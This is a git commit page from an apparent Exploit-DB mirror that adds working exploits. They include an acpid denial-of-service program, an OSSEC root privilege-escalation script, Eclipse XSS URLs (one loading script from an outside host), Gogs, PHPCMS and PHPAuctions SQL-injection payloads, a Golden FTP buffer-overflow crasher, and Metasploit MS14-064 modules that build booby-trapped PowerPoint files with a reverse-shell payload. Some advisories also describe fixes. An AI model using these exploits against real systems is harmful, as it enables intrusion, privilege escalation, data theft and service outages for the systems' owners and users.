bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 11_16_2014

Browse source
This commit is contained in:
Offensive Security 2014-11-16 04:49:47 +00:00
parent da2dbbdc68
commit 998a91f75a
14 changed files with 1247 additions and 6 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

18
files.csv
View file

@ -27668,7 +27668,7 @@ id,file,description,date,author,platform,type,port
30847,platforms/php/webapps/30847.txt,"phpMyChat 0.14.5 chat/users_popupL.php3 Multiple Parameter XSS",2007-12-04,beenudel1986,php,webapps,0
30848,platforms/php/webapps/30848.txt,"Joomla 1.5 RC3 com_content index.php view Parameter SQL Injection",2007-12-05,beenudel1986,php,webapps,0
30849,platforms/php/webapps/30849.txt,"Joomla 1.5 RC3 com_search Component index.php Multiple Parameter SQL Injection",2007-12-05,beenudel1986,php,webapps,0
30850,platforms/multiple/remote/30850.txt,"HFS HTTP File Server 2.2/2.3 Arbitrary File Upload Vulnerability",2007-12-05,"Luigi Auriemma",multiple,remote,0
30850,platforms/multiple/remote/30850.txt,"HFS HTTP File Server 2.2/2.3 - Arbitrary File Upload Vulnerability",2007-12-05,"Luigi Auriemma",multiple,remote,0
30851,platforms/php/webapps/30851.txt,"VisualShapers ezContents 1.4.5 File Disclosure Vulnerability",2007-12-05,p4imi0,php,webapps,0
30852,platforms/php/webapps/30852.txt,"Kayako SupportSuite 3.0.32 PHP_SELF Trigger_Error Function Cross-Site Scripting Vulnerability",2007-12-06,imei,php,webapps,0
30853,platforms/php/webapps/30853.txt,"OpenNewsletter 2.5 Compose.PHP Cross-Site Scripting Vulnerability",2007-12-06,Manu,php,webapps,0
@ -31218,7 +31218,7 @@ id,file,description,date,author,platform,type,port
34664,platforms/ios/webapps/34664.txt,"Briefcase 4.0 iOS - Code Execution & File Include Vulnerability",2014-09-15,Vulnerability-Lab,ios,webapps,0
34666,platforms/php/webapps/34666.py,"ALCASAR <= 2.8.1 - Remote Root Code Execution Vulnerability",2014-09-15,eF,php,webapps,80
34667,platforms/linux/shellcode/34667.c,"Connect Back Shellcode - 139 bytes",2014-09-15,MadMouse,linux,shellcode,0
34668,platforms/windows/remote/34668.txt,"Http File Server 2.3.x - Remote Command Execution",2014-09-15,"Daniele Linguaglossa",windows,remote,80
34668,platforms/windows/remote/34668.txt,"HFS HTTP File Server 2.3.x - Remote Command Execution",2014-09-15,"Daniele Linguaglossa",windows,remote,80
34669,platforms/multiple/remote/34669.rb,"Railo Remote File Include",2014-09-15,metasploit,multiple,remote,80
34670,platforms/multiple/remote/34670.rb,"ManageEngine Eventlog Analyzer Arbitrary File Upload",2014-09-15,metasploit,multiple,remote,8400
34671,platforms/java/remote/34671.rb,"SolarWinds Storage Manager Authentication Bypass",2014-09-15,metasploit,java,remote,9000
@ -31723,8 +31723,20 @@ id,file,description,date,author,platform,type,port
35226,platforms/windows/remote/35226.py,"Avira AntiVir Personal Multiple Code Execution Vulnerabilities (2)",2011-01-14,D.Elser,windows,remote,0
35227,platforms/php/webapps/35227.txt,"Alguest 1.1c-patched 'elimina' Parameter SQL Injection Vulnerability",2011-01-14,"Aliaksandr Hartsuyeu",php,webapps,0
35228,platforms/php/webapps/35228.txt,"CompactCMS 1.4.1 Multiple Cross Site Scripting Vulnerabilities",2011-01-15,NLSecurity,php,webapps,0
35229,platforms/windows/remote/35229.html,"Internet Explorer <11 - OLE Automation Array Remote Code Execution",2014-11-13,yuange,windows,remote,0
35229,platforms/windows/remote/35229.html,"Internet Explorer < 11 - OLE Automation Array Remote Code Execution",2014-11-13,yuange,windows,remote,0
35230,platforms/windows/remote/35230.rb,"Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF)",2014-11-13,"Wesley Neelen & Rik van Duijn",windows,remote,0
35231,platforms/php/webapps/35231.txt,"Advanced Webhost Billing System 2.9.2 'oid' Parameter SQL Injection Vulnerability",2011-01-16,ShivX,php,webapps,0
35232,platforms/linux/remote/35232.txt,"Pango Font Parsing 'pangoft2-render.c' Heap Corruption Vulnerability",2011-01-18,"Dan Rosenberg",linux,remote,0
35233,platforms/multiple/webapps/35233.txt,"B-Cumulus 'tagcloud' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-01-18,MustLive,multiple,webapps,0
35234,platforms/linux/local/35234.py,"OSSEC 2.8 - Insecure Temporary File Creation Vulnerability Privilege Escalation",2014-11-14,skynet-13,linux,local,0
35235,platforms/windows/local/35235.rb,"MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python",2014-11-14,metasploit,windows,local,0
35236,platforms/windows/local/35236.rb,"MS14-064 Microsoft Windows OLE Package Manager Code Execution",2014-11-14,metasploit,windows,local,0
35237,platforms/multiple/webapps/35237.txt,"Gogs (label pararm) - SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,80
35238,platforms/multiple/webapps/35238.txt,"Gogs (users and repos q pararm) - SQL Injection Vulnerabilities",2014-11-14,"Timo Schmid",multiple,webapps,0
35239,platforms/php/webapps/35239.txt,"PHPCMS 2008 V2 'data.php' SQL Injection Vulnerability",2011-01-17,R3d-D3V!L,php,webapps,0
35240,platforms/linux/dos/35240.c,"acpid 1.0.x Multiple Local Denial of Service Vulnerabilities",2011-01-19,"Vasiliy Kulikov",linux,dos,0
35241,platforms/windows/remote/35241.pl,"ESTsoft ALZip 8.12.0.3 '.zip' File Buffer Overflow Vulnerability",2011-01-19,"C4SS!0 G0M3S",windows,remote,0
35242,platforms/multiple/remote/35242.txt,"Eclipse 3.3.2 IDE Help Server help/advanced/searchView.jsp searchWord Parameter XSS",2008-04-24,Rob,multiple,remote,0
35243,platforms/multiple/remote/35243.txt,"Eclipse 3.3.2 IDE Help Server help/advanced/workingSetManager.jsp workingSet Parameter XSS",2008-04-24,Rob,multiple,remote,0
35244,platforms/windows/dos/35244.py,"Golden FTP Server 4.70 Malformed Message Denial Of Service Vulnerability",2011-01-19,"Craig Freyman",windows,dos,0
35245,platforms/php/webapps/35245.txt,"PHPAuctions 'viewfaqs.php' SQL Injection Vulnerability",2011-01-19,"BorN To K!LL",php,webapps,0

Can't render this file because it is too large.

76
platforms/linux/dos/35240.c Executable file
View file

@ -0,0 +1,76 @@
source: http://www.securityfocus.com/bid/45915/info
The 'acpid' daemon is prone to multiple local denial-of-service vulnerabilities.
Successful exploits will allow attackers to cause the application to hang, denying service to legitimate users.
acpid 1.0.10 is vulnerable; other versions may also be affected.
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <errno.h>
#include <sys/un.h>
#include <fcntl.h>
#include <unistd.h>
/* Tested on acpid-1.0.10 (Ubuntu 10.04) */
int ud_connect(const char *name)
{
int fd;
int r;
struct sockaddr_un addr;
fd = socket(AF_UNIX, SOCK_STREAM, 0);
if (fd < 0) {
perror("socket");
return fd;
}
memset(&addr, 0, sizeof(addr));
addr.sun_family = AF_UNIX;
sprintf(addr.sun_path, "%s", name);
r = connect(fd, (struct sockaddr *)&addr, sizeof(addr));
if (r < 0) {
perror("connect");
close(fd);
return r;
}
return fd;
}
int main(int argc, char *argv[])
{
int fd;
char c;
if (argc != 2) {
fprintf(stderr, "Usage: prog fname\n");
exit(1);
}
fd = ud_connect(argv[1]);
if (fd < 0)
exit(1);
printf("\"Hanging\" socket opened, fd = %d\n", fd);
fd = ud_connect(argv[1]);
if (fd < 0)
exit(1);
printf("Normal socket opened, fd = %d\n", fd);
while (1) {
static int n;
read(fd, &c, 1);
fflush(stdout);
if (c == '\n') {
printf("%d messages in queue\n", ++n);
}
}
}

82
platforms/linux/local/35234.py Executable file
View file

@ -0,0 +1,82 @@
#!/usr/bin/python
# Exploit Title: ossec 2.8 Insecure Temporary File Creation Vulnerability Privilege Escalation
# Date: 14-11-14
# Exploit Author: skynet-13
# Vendor Homepage: www.ossec.net/
# Software Link: https://github.com/ossec/ossec-hids/archive/2.8.1.tar.gz
# Version: OSSEC - 2.8
# Tested on: Ubunutu x86_64
# CVE : 2014-5284
# Created from Research by
# Jeff Petersen
# Roka Security LLC
# jpetersen@rokasecurity.com
# Original info at https://github.com/ossec/ossec-hids/releases/tag/2.8.1
# Run this on target machine and follow instructions to execute command as root
from twisted.internet import inotify
from twisted.python import filepath
from twisted.internet import reactor
import os
import optparse
import signal
class HostDenyExploiter(object):
def __init__(self, path_to_watch, cmd):
self.path = path_to_watch
self.notifier = inotify.INotify()
self.exploit = cmd
def create_files(self):
print "=============================================="
print "Creating /tmp/hosts.deny.300 through /tmp/hosts.deny.65536 ..."
for i in range(300, 65536):
filename = "/tmp/hosts.deny.%s" % i
f = open(filename, 'w')
f.write("")
f.close()
def watch_files(self):
print "=============================================="
print "Monitoring tmp for file change...."
print "ssh into the system a few times with an incorrect password"
print "Then wait for up to 10 mins"
print "=============================================="
self.notifier.startReading()
self.notifier.watch(filepath.FilePath(self.path), callbacks=[self.on_file_change])
def write_exploit_to_file(self, path):
print 'Writing exploit to this file'
f = open(str(path).split("'")[1], 'w')
f.write(' sshd : ALL : twist %s \n' % self.exploit)
f.close()
print "=============================================="
print " ssh in again to execute the command"
print "=============================================="
print " End Prog."
os.kill(os.getpid(), signal.SIGUSR1)
def on_file_change(self, watch, path, mask):
print 'File: ', str(path).split("'")[1], ' has just been modified'
self.notifier.stopReading()
self.write_exploit_to_file(path)
if __name__ == '__main__':
parser = optparse.OptionParser("usage of program \n" + "-c Command to run as root in quotes\n")
parser.add_option('-c', dest='cmd', type='string', help='Used to specify a command to run as root')
(options, args) = parser.parse_args()
cmd = options.cmd
if options.cmd is None:
print parser.usage
exit(0)
ex = HostDenyExploiter('/tmp', cmd)
ex.create_files()
ex.watch_files()
reactor.run()
exit(0)

9
platforms/multiple/remote/35242.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45921/info
Eclipse IDE is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Eclipse IDE 3.3.2 is vulnerable; other versions may also be affected.
http://www.example.com/help/advanced/searchView.jsp?searchWord=a");}alert('xss');</script>

10
platforms/multiple/remote/35243.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/45921/info
Eclipse IDE is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Eclipse IDE 3.3.2 is vulnerable; other versions may also be affected.
http://www.example.com/help/advanced/workingSetManager.jsp?operation=add&workingSet='%3E%3Cscript%20src%3D'http%3A%2F%2F1.2.3.4%2Fa.js'%3E%3C%2Fscript%3E
&hrefs=%2Fcom.adobe.flexbuilder.help.api%2Ftoc.xml&oldName=

186
platforms/multiple/webapps/35237.txt Executable file
View file

@ -0,0 +1,186 @@
Blind SQL Injection in Gogs label search
========================================
Researcher: Timo Schmid <tschmid@ernw.de>
Description
===========
Gogs(Go Git Service) is a painless self-hosted Git Service written in
Go. (taken
from [1])
It is very similiar to the github hosting plattform. Multiple users can
create
multiple repositories and share code with others with the git version
control
system. Repositories can be marked as public or private to prevent
access from
unauthorized users.
Gogs provides a view to filter issues by labels. This view is accessible at
/<username>/<repository>/issues?labels=&type=&state=
The labels Parameter of this view is vulnerable to a blind SQL injection.
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
CVSS Base Score
===============
6.6 (AV:N / AC:H / Au:N / C:C / I:P / A:P)
CVE-ID
======
CVE-2014-8681
Impact
======
The vulnerability results at least in a complete compromise of the database.
Depending on the particular database configuration a compromise of the
system
is also possible.
Status
======
Fixed by Vendor
Vulnerable Code Section
=======================
models/issue.go:
[...]
// GetIssues returns a list of issues by given conditions.
func GetIssues(uid, rid, pid, mid int64, page int, isClosed bool, labelIds,
sortType string) ([]Issue, error) {
sess := x.Limit(20, (page-1)*20)
if rid > 0 {
sess.Where("repo_id=?", rid).And("is_closed=?", isClosed)
} else {
sess.Where("is_closed=?", isClosed)
}
if uid > 0 {
sess.And("assignee_id=?", uid)
} else if pid > 0 {
sess.And("poster_id=?", pid)
}
if mid > 0 {
sess.And("milestone_id=?", mid)
}
if len(labelIds) > 0 {
for _, label := range strings.Split(labelIds, ",") {
sess.And("label_ids like '%$" + label + "|%'")
}
}
[...]
The vulnerability exists because of a string concatination in the SQL
query with
user supplied data. A attacker is restricted to not use commas in the
injection
string as the program splits input at commas.
Proof of Concept
================
Test of version string contains at least 10 characters:
http://www.example.com/user/repos/issues?label=' or
char_length(@@version) > 10
and '|%'='&type=all&state=
Returns all issues if true, non if false.
This could be used to extract data with a binary search.
Solution
========
This vulnerability could easily be fixed by using prepared statements:
sess.And("label_ids like ?", "%$" + label + "|%")
Update to Version 0.5.6.1025.
Affected Versions
=================
>= v0.3.1-9-g49dc57e
<= v0.5.6.1024-gf1d8746
Timeline
========
2014-09-25: Developer informed
2014-10-16: Contact of developer regarding fix
2014-10-25: Working together with developer on fix
2014-10-25: Fixed by ensuring datatype of user input
2014-11-14: CVE-ID assigned
Credits
=======
Pascal Turbing <pturbing@ernw.de>
Jiahua (Joe) Chen <u@gogs.io>
References
==========
[1] https://github.com/gogits/gogs
[2] http://gogs.io/
[3]
http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-1/
[4]
http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-2/
[5]
http://www.insinuator.net/2012/06/sql-injection-testing-for-business-purposes-part-3/
[6] https://www.ernw.de/download/BC-1401.txt
Advisory-ID
===========
BC-1401
Disclaimer
==========
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO
warranties, implied or otherwise, with regard to this information or its
use.
Any use of this information is at the user's risk. In no event shall the
author/
distributor be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.
--
Timo Schmid
ERNW GmbH, Carl-Bosch-Str. 4, 69115 Heidelberg - www.ernw.de
Tel. +49 6221 480390 - Fax 6221 419008 - Cell +49 151 16227192
PGP-FP 971B D4F7 5DD1 FCED 11FC 2C61 7AB6 927D 6F26 6CE0
Handelsregister Mannheim: HRB 337135
Geschaeftsfuehrer: Enno Rey
==============================================================
|| Blog: www.insinuator.net | | Conference: www.troopers.de ||
==============================================================
================== TROOPERS15 ==================
* International IT Security Conference & Workshops
* 16th - 20st March 2015 / Heidelberg, Germany
* www.troopers.de
====================================================

362
platforms/multiple/webapps/35238.txt Executable file
View file

@ -0,0 +1,362 @@
Unauthenticated SQL Injection in Gogs repository search
=======================================================
Researcher: Timo Schmid <tschmid@ernw.de>
Description
===========
Gogs(Go Git Service) is a painless self-hosted Git Service written in
Go. (taken
from [1])
It is very similiar to the github hosting plattform. Multiple users can
create
multiple repositories and share code with others with the git version
control
system. Repositories can be marked as public or private to prevent
access from
unauthorized users.
Gogs provides an api view to give javascript code the possibility to
search for
existing repositories in the system. This view is accessible at
/api/v1/repos/search?q=<search query>.
The q Parameter of this view is vulnerable to SQL injection.
Exploitation Technique
======================
Remote
Severity Level
==============
Critical
CVSS Base Score
===============
8.3 (AV:N / AC:M / Au:N / C:C / I:P / A:P)
CVE-ID
======
CVE-2014-8682
Impact
======
The vulnerability results at least in a complete compromise of the database.
Depending on the particular database configuration a compromise of the
system
is also possible.
Status
======
Fixed by Vendor
Vulnerable Code Section
=======================
models/repo.go:
[...]
// SearchRepositoryByName returns given number of repositories whose name
contains keyword.
func SearchRepositoryByName(opt SearchOption) (repos []*Repository, err
error) {
// Prevent SQL inject.
opt.Keyword = FilterSQLInject(opt.Keyword)
if len(opt.Keyword) == 0 {
return repos, nil
}
opt.Keyword = strings.ToLower(opt.Keyword)
repos = make([]*Repository, 0, opt.Limit)
// Append conditions.
sess := x.Limit(opt.Limit)
if opt.Uid > 0 {
sess.Where("owner_id=?", opt.Uid)
}
if !opt.Private {
sess.And("is_private=false")
}
sess.And("lower_name like '%" + opt.Keyword + "%'").Find(&repos)
return repos, err
}
[...]
The vulnerability exists because of a string concatination in the SQL
query with
user supplied data. Because of the SQL filter at the method entry, attackers
can't use spaces (0x20) and since v0.5.6.1025-g83283b commas are also
filtered.
Proof of Concept
================
Request:
http://www.example.com/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09
(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09
user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)
%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09
as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as
%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09
a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09
JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN
%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN
%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN
%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN
%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN
%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27
Response:
{"data":[{"repolink":"bluec0re/test"},{"repolink":"bluec0re/secret"},{"repolink"
:"bluec0re/root@localhost"}],"ok":true}
Solution
========
This vulnerability could easily be fixed by using prepared statements:
sess.And("lower_name like ?", "%" + opt.Keyword + "%").Find(&repos)
Update to version 0.5.6.1105.
Affected Versions
=================
>= v0.3.1-9-g49dc57e
<= v0.5.6.1104-g0c5ba45
Timeline
========
2014-09-25: Developer informed
2014-10-16: Contact of developer regarding fix
2014-10-25: Working together with developer on fix
2014-11-03: Contacted developer
2014-11-04: Fixed in master branch
2014-11-14: CVE-ID assigned
Credits
=======
Pascal Turbing <pturbing@ernw.de>
Jiahua (Joe) Chen <u@gogs.io>
References
==========Update to version 0.5.6.1105.
[1] https://github.com/gogits/gogs
[2] http://gogs.io/
[3]
http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-1/
[4]
http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-2/
[5]
http://www.insinuator.net/2012/06/sql-injection-testing-for-business-purposes-part-3/
[6] https://www.ernw.de/download/BC-1402.txt
Advisory-ID
===========
BC-1402
Disclaimer
==========
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO
warranties, implied or otherwise, with regard to this information or its
use.
Any use of this information is at the user's risk. In no event shall the
author/
distributor be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.
Unauthenticated SQL Injection in Gogs user search
=================================================
Researcher: Timo Schmid <tschmid@ernw.de>
Description
===========
Gogs(Go Git Service) is a painless self-hosted Git Service written in
Go. (taken
from [1])
It is very similiar to the github hosting plattform. Multiple users can
create
multiple repositories and share code with others with the git version
control
system. Repositories can be marked as public or private to prevent
access from
unauthorized users.
Gogs provides an api view to give javascript code the possibility to
search for
existing users in the system. This view is accessible at
/api/v1/users/search?q=<search query>.
The q Parameter of this view is vulnerable to SQL injection.
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
CVSS Base Score
===============
8.3 (AV:N / AC:M / Au:N / C:C / I:P / A:P)
CVE-ID
======
CVE-2014-8682
Impact
======
The vulnerability results at least in a complete compromise of the database.
Depending on the particular database configuration a compromise of the
system
is also possible.
Status
======
Fixed by Vendor
Vulnerable Code Section
=======================
models/user.go:
[...]
// SearchUserByName returns given number of users whose name contains
keyword.
func SearchUserByName(opt SearchOption) (us []*User, err error) {
opt.Keyword = FilterSQLInject(opt.Keyword)
if len(opt.Keyword) == 0 {
return us, nil
}
opt.Keyword = strings.ToLower(opt.Keyword)
us = make([]*User, 0, opt.Limit)
err = x.Limit(opt.Limit).Where("type=0").And("lower_name like '%" +
opt.Keyword + "%'").Find(&us)
return us, err
}
[...]
The vulnerability exists because of a string concatination in the SQL
query with
user supplied data. Because of the SQL filter at the method entry, attackers
can't use spaces (0x20) and since v0.5.6.1025-g83283b commas are also
filtered.
Proof of Concept
================
Request:
http://www.example.com/api/v1/users/search?q='/**/and/**/false)/**/union/**/
select/**/null,null,@@version,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from
/**/mysql.db/**/where/**/('%25'%3D'
Response:
{"data":[{"username":"5.5.40-0ubuntu0.14.04.1","avatar":
"//1.gravatar.com/avatar/"}],"ok":true}
Solution
========
This vulnerability could easily be fixed by using prepared statements:
err = x.Limit(opt.Limit).Where("type=0").And("lower_name like ?", "%" +
opt.Keyword + "%").Find(&us)
Update to version 0.5.6.1105.
Affected Versions
=================
>= v0.3.1-9-g49dc57e
<= v0.5.6.1104-g0c5ba45
Timeline
========
2014-09-25: Developer informed
2014-10-16: Contact of developer regarding fix
2014-10-25: Working together with developer on fix
2014-11-03: Contacted developer
2014-11-04: Fixed in master branch
2014-11-14: CVE-ID assigned
Credits
=======
Pascal Turbing <pturbing@ernw.de>
Jiahua (Joe) Chen <u@gogs.io>
References
==========
[1] https://github.com/gogits/gogs
[2] http://gogs.io/
[3]
http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-1/
[4]
http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-2/
[5]
http://www.insinuator.net/2012/06/sql-injection-testing-for-business-purposes-part-3/
[6] https://www.ernw.de/download/BC-1403.txt
Advisory-ID
===========
BC-1403
Disclaimer
==========
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO
warranties, implied or otherwise, with regard to this information or its
use.
Any use of this information is at the user's risk. In no event shall the
author/
distributor be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.
--
Timo Schmid
ERNW GmbH, Carl-Bosch-Str. 4, 69115 Heidelberg - www.ernw.de
Tel. +49 6221 480390 - Fax 6221 419008 - Cell +49 151 16227192
PGP-FP 971B D4F7 5DD1 FCED 11FC 2C61 7AB6 927D 6F26 6CE0
Handelsregister Mannheim: HRB 337135
Geschaeftsfuehrer: Enno Rey
==============================================================
|| Blog: www.insinuator.net | | Conference: www.troopers.de ||
==============================================================
================== TROOPERS15 ==================
* International IT Security Conference & Workshops
* 16th - 20st March 2015 / Heidelberg, Germany
* www.troopers.de
====================================================

9
platforms/php/webapps/35239.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45913/info
PHPCMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
PHPCMS 2008 V2 is vulnerable; other versions may also be affected.
http://www.example.com/path/data.php?action=get&where_time=-1+union+all+select+1,database()--

7
platforms/php/webapps/35245.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/45928/info
PHPAuctions is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/viewfaqs.php?cat=2 and substring(version(),1,1)=5

39
platforms/windows/dos/35244.py Executable file
View file

@ -0,0 +1,39 @@
source: http://www.securityfocus.com/bid/45924/info
Golden FTP Server is prone to a denial-of-service vulnerability.
Exploits will cause the application to crash, denying service to legitimate users.
Golden FTP Server 4.70 is vulnerable; other versions may also be affected.
import socket
import sys
import time
Bs = &#039;\x42&#039; * 4
buffer = &#039;\x41&#039; * 533 + Bs + &#039;\xcc&#039; * 300
if len(sys.argv) != 3:
print "Usage: ./goldenftp.py <ip> <port>"
sys.exit()
ip = sys.argv[1]
port = sys.argv[2]
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
print "[*] Sending evil buffer"
s.connect((ip,int(port)))
s.recv(1024)
time.sleep(2)
s.send(&#039;USER anonymous&#039;+ &#039;\r\n&#039;)
s.recv(1024)
time.sleep(3)
s.send(&#039;PASS &#039; + buffer + &#039;\r\n&#039;)
s.recv(1024)
time.sleep(1)
s.close()
except:
print "Can&#039;t Connect to Server"
sys.exit()

151
platforms/windows/local/35235.rb Executable file
View file

@ -0,0 +1,151 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::EXE
def initialize(info={})
super(update_info(info,
'Name' => "MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python",
'Description' => %q{
This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)
allowing arbitrary code execution, bypassing the patch MS14-060, for the vulnerability
publicly known as "Sandworm", on systems with Python for Windows installed. Windows Vista
SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be vulnerable.
However, based on our testing, the most reliable setup is on Windows platforms running
Office 2013 and Office 2010 SP2. Please keep in mind that some other setups such as
those using Office 2010 SP1 may be less stable, and may end up with a crash due to a
failure in the CPackage::CreateTempFileName function.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Haifei Li', # Vulnerability discovery and exploit technique
'sinn3r', # Metasploit module
'juan vazquez' # Metasploit module
],
'References' =>
[
['CVE', '2014-6352'],
['MSB', 'MS14-064'],
['BID', '70690'],
['URL', 'http://blogs.mcafee.com/mcafee-labs/bypassing-microsofts-patch-for-the-sandworm-zero-day-even-editing-can-cause-harm']
],
'Platform' => 'python',
'Arch' => ARCH_PYTHON,
'Targets' =>
[
['Windows 7 SP1 with Python for Windows / Office 2010 SP2 / Office 2013', {}],
],
'Privileged' => false,
'DefaultOptions' =>
{
'Payload' => 'python/meterpreter/reverse_tcp'
},
'DisclosureDate' => "Nov 12 2014",
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [true, 'The PPSX file', 'msf.ppsx'])
], self.class)
end
def exploit
print_status("Creating '#{datastore['FILENAME']}' file ...")
payload_packager = create_packager('tabnanny.py', payload.encoded)
trigger_packager = create_packager("#{rand_text_alpha(4)}.py", rand_text_alpha(4 + rand(10)))
zip = zip_ppsx(payload_packager, trigger_packager)
file_create(zip)
end
def zip_ppsx(ole_payload, ole_trigger)
zip_data = {}
data_dir = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4114', 'template')
Dir["#{data_dir}/**/**"].each do |file|
unless File.directory?(file)
zip_data[file.sub(data_dir,'')] = File.read(file)
end
end
# add the otherwise skipped "hidden" file
file = "#{data_dir}/_rels/.rels"
zip_data[file.sub(data_dir,'')] = File.read(file)
# put our own OLE streams
zip_data['/ppt/embeddings/oleObject1.bin'] = ole_payload
zip_data['/ppt/embeddings/oleObject2.bin'] = ole_trigger
# create the ppsx
ppsx = Rex::Zip::Archive.new
zip_data.each_pair do |k,v|
ppsx.add_file(k,v)
end
ppsx.pack
end
def create_packager(file_name, contents)
file_info = [2].pack('v')
file_info << "#{file_name}\x00"
file_info << "#{file_name}\x00"
file_info << "\x00\x00"
extract_info = [3].pack('v')
extract_info << [file_name.length + 1].pack('V')
extract_info << "#{file_name}\x00"
file = [contents.length].pack('V')
file << contents
append_info = [file_name.length].pack('V')
append_info << Rex::Text.to_unicode(file_name)
append_info << [file_name.length].pack('V')
append_info << Rex::Text.to_unicode(file_name)
append_info << [file_name.length].pack('V')
append_info << Rex::Text.to_unicode(file_name)
ole_data = file_info + extract_info + file + append_info
ole_contents = [ole_data.length].pack('V') + ole_data
ole = create_ole("\x01OLE10Native", ole_contents)
ole
end
def create_ole(stream_name, data)
ole_tmp = Rex::Quickfile.new('ole')
stg = Rex::OLE::Storage.new(ole_tmp.path, Rex::OLE::STGM_WRITE)
stm = stg.create_stream(stream_name)
stm << data
stm.close
directory = stg.instance_variable_get(:@directory)
directory.each_entry do |entry|
if entry.instance_variable_get(:@_ab) == 'Root Entry'
# 0003000C-0000-0000-c000-000000000046 # Packager
clsid = Rex::OLE::CLSID.new("\x0c\x00\x03\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46")
entry.instance_variable_set(:@_clsId, clsid)
end
end
# write to disk
stg.close
ole_contents = File.read(ole_tmp.path)
ole_tmp.close
ole_tmp.unlink
ole_contents
end
end

152
platforms/windows/local/35236.rb Executable file
View file

@ -0,0 +1,152 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::EXE
def initialize(info={})
super(update_info(info,
'Name' => "MS14-064 Microsoft Windows OLE Package Manager Code Execution",
'Description' => %q{
This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)
allowing arbitrary code execution, publicly exploited in the wild as MS14-060 patch bypass.
The Microsoft update tried to fix the vulnerability publicly known as "Sandworm". Platforms
such as Windows Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known
to be vulnerable. However, based on our testing, the most reliable setup is on Windows
platforms running Office 2013 and Office 2010 SP2. And please keep in mind that some other
setups such as using Office 2010 SP1 might be less stable, and sometimes may end up with a
crash due to a failure in the CPackage::CreateTempFileName function.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Haifei Li', # Vulnerability discovery
